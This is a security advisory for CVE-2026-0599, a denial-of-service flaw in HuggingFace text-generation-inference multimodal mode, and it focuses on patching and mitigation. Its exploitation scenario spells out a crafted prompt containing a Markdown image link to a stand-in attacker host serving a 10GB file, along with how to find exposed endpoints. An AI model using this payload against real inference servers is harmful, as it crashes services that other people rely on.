CVE-2026-0599

GHSA-j7x9-7j54-2v3h HIGH
Published February 2, 2026
CISO Take

If you're running HuggingFace TGI in VLM (multimodal) mode, patch to 3.3.7 now — this is a trivial, unauthenticated DoS that can crash your inference host with a single crafted request. Default deployments have no memory limits and no authentication, meaning your entire AI inference stack is one HTTP request away from an OOM crash. Treat this as critical if your AI pipelines serve multimodal workloads without an auth layer or network egress controls.

Affected Systems

Package Ecosystem Vulnerable Range Patched
text-generation pip < 3.3.7 3.3.7

Do you use text-generation? You're affected.

Severity & Risk

CVSS 3.1
7.5 / 10
EPSS
0.2%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. 1. PATCH: Upgrade to text-generation-inference 3.3.7 immediately — this is the definitive fix. 2. INTERIM if patching is blocked: Enable API authentication via --authentication-config flag to require bearer tokens; this prevents unauthenticated exploitation. 3. ADD EGRESS CONTROLS: Restrict outbound HTTP from the TGI process/container to internal or whitelisted endpoints only — this breaks the attack chain by preventing external image fetching. 4. ENFORCE MEMORY LIMITS: Set container memory limits (Docker: --memory=Xg, Kubernetes: resources.limits.memory) to contain blast radius and prevent host OOM. 5. DEPLOY API GATEWAY: Place TGI behind an API gateway or reverse proxy with rate limiting and request body size limits (e.g., nginx client_max_body_size, Kong rate-limit plugin). 6. DETECTION: Alert on anomalous memory growth spikes in inference containers, unusual outbound bandwidth from inference pods, and repeated 429/413 response codes paired with sustained resource utilization.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system operational management A.9.2 - AI System Availability and Resilience
NIST AI RMF
GOVERN 1.1 - AI risk is integrated into organizational risk management GOVERN 1.4 - Risks associated with AI system vulnerabilities are identified and managed MANAGE 2.2 - Mechanisms to detect, respond to, and recover from AI system failures
OWASP LLM Top 10
LLM04 - Model Denial of Service

Technical Details

NVD Description

A vulnerability in huggingface/text-generation-inference version 3.3.6 allows unauthenticated remote attackers to exploit unbounded external image fetching during input validation in VLM mode. The issue arises when the router scans inputs for Markdown image links and performs a blocking HTTP GET request, reading the entire response body into memory and cloning it before decoding. This behavior can lead to resource exhaustion, including network bandwidth saturation, memory inflation, and CPU overutilization. The vulnerability is triggered even if the request is later rejected for exceeding token limits. The default deployment configuration, which lacks memory usage limits and authentication, exacerbates the impact, potentially crashing the host machine. The issue is resolved in version 3.3.7.

Exploitation Scenario

An attacker identifies a publicly accessible TGI endpoint running in VLM mode — discoverable via Shodan or by probing common ports (8080, 8000) with the /info endpoint. They craft a POST to /generate containing a prompt with a Markdown image reference: `What do you see? ![img](http://attacker-controlled.com/10gb-random.bin)`. The TGI router parses the Markdown, initiates a blocking HTTP GET to the attacker's server, and streams the full 10GB response into memory before any token-limit validation occurs. The attacker runs this concurrently from multiple IPs or even a single client with multiple threads. Within seconds to minutes (depending on bandwidth), the TGI process exhausts available RAM, triggering OOM kills and crashing the inference service — with no authentication required and no prior knowledge of the model or API needed.

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
February 2, 2026
Last Modified
February 3, 2026
First Seen
February 2, 2026